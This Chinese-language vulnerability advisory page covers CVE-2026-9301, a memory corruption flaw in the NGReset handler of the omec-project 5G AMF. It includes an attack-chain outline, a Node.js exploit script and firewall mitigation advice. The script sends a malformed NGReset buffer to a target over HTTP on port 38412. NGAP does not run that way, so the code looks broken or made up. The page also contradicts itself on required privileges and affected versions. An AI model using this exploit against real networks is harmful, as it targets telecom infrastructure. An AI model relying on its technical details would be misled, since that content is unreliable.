IPBUF安全漏洞报告
English
CVE-2026-9301 CVSS 6.3 中危

CVE-2026-9301: omec-project AMF NGReset消息处理器内存损坏漏洞

披露日期: 2026-05-23

漏洞信息

漏洞编号
CVE-2026-9301
漏洞类型
内存损坏
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
omec-project AMF

相关标签

内存损坏5G核心网AMFNGResetomec-project缓冲区溢出CVE-2026-9301

漏洞概述

CVE-2026-9301是发生在omec-project AMF(5G核心网接入和移动性管理功能)组件中的内存损坏漏洞。该漏洞存在于NGReset消息处理器中,攻击者可以通过构造恶意的NGReset消息来触发内存损坏问题。AMF是5G核心网的关键组件,负责处理用户的接入和移动性管理功能。由于该漏洞影响的是核心网元组件,攻击成功可能导致服务中断、用户数据泄露或进一步的恶意操作。值得注意的是,该漏洞的利用代码已经公开,且可远程利用,具有一定的现实威胁。CVSS评分6.3属于中等严重程度,但考虑到攻击复杂度较低且无需特殊权限即可发起攻击,建议相关用户尽快采取修复措施。

技术细节

该漏洞存在于omec-project AMF的NGReset消息处理逻辑中。NGReset消息是5G NR协议中用于重置UE(用户设备)与网络之间连接的消息。当AMF接收到恶意的NGReset请求时,消息处理器未能正确验证和清理输入数据,导致内存缓冲区处理异常。具体表现为在处理特定构造的NGReset消息时,可能出现缓冲区溢出、释放后使用或空指针解引用等问题。由于AMF在5G网络中承担核心的移动性管理职责,攻击者可以通过发送精心设计的NGReset消息来触发内存损坏,从而可能导致服务崩溃、信息泄露甚至执行任意代码。该漏洞影响AMF 2.1.1及以下版本。

攻击链分析

STEP 1
侦察阶段
攻击者识别目标网络中运行的omec-project AMF服务,探测其版本信息(<=2.1.1)
STEP 2
漏洞利用准备
攻击者构造包含恶意载荷的NGReset消息,设计特定字段值触发NGReset消息处理器中的内存损坏
STEP 3
漏洞触发
攻击者向目标AMF发送精心构造的NGReset消息,通过网络(通常是38412端口的NGAP协议)传输恶意载荷
STEP 4
内存损坏发生
AMF的NGReset消息处理器在处理畸形数据时发生缓冲区溢出或其他内存损坏问题
STEP 5
攻击影响
根据内存损坏类型,可能导致服务崩溃(DoS)、敏感信息泄露或代码执行

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2026-9301 PoC - NGReset Message Memory Corruption // Target: omec-project AMF < 2.1.1 // Component: NGReset Message Handler const http = require('http'); // Construct malicious NGReset message to trigger memory corruption function constructMaliciousNGReset() { // NGReset Message Type: 0x00C0 const ngResetMsg = Buffer.alloc(128); // Message Header ngResetMsg.writeUInt8(0x00, 0); // Protocol Discriminator ngResetMsg.writeUInt8(0xC0, 1); // Message Type (NGReset) ngResetMsg.writeUInt16BE(0x0001, 2); // Procedure Transaction ID // Trigger memory corruption with malformed NGReset cause ngResetMsg.writeUInt8(0x00, 5); // NGReset Cause - Critical ngResetMsg.writeUInt16BE(0xFFFF, 6); // Malformed cause value // UE Identity List - overflow condition ngResetMsg.writeUInt8(0x01, 8); // Number of UEs ngResetMsg.writeUInt8(0xFF, 9); // AMF Set ID - triggers overflow // Padding with trigger bytes for (let i = 10; i < 128; i++) { ngResetMsg.writeUInt8(0x41, i); // Pattern to identify corruption } return ngResetMsg; } // Send exploit payload to AMF async function exploit(targetIP, targetPort = 38412) { console.log('[*] CVE-2026-9301 Exploit'); console.log(`[*] Target: ${targetIP}:${targetPort}`); const payload = constructMaliciousNGReset(); const options = { hostname: targetIP, port: targetPort, path: '/ngap/ngreset', method: 'POST', headers: { 'Content-Type': 'application/vnd.3gpp.ngap', 'Content-Length': payload.length, 'X-NGAP-MessageType': 'NGReset' } }; const req = http.request(options, (res) => { console.log(`[+] Response Status: ${res.statusCode}`); }); req.write(payload); req.end(); console.log('[+] Malicious NGReset message sent'); console.log('[*] Check AMF service status for memory corruption'); } // Usage: node cve-2026-9301-poc.js <target_ip> const target = process.argv[2] || '127.0.0.1'; exploit(target);

影响范围

omec-project AMF <= 2.1.1

防御指南

临时缓解措施
在官方补丁发布之前,建议通过防火墙限制对AMF服务端口(NGAP)的访问,仅允许授权网元(如gNB、SMF)访问。同时可启用AMF的日志审计功能,监控异常的NGReset消息请求。对于非关键业务场景,可考虑暂时禁用NGReset功能或部署负载均衡实现故障转移。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表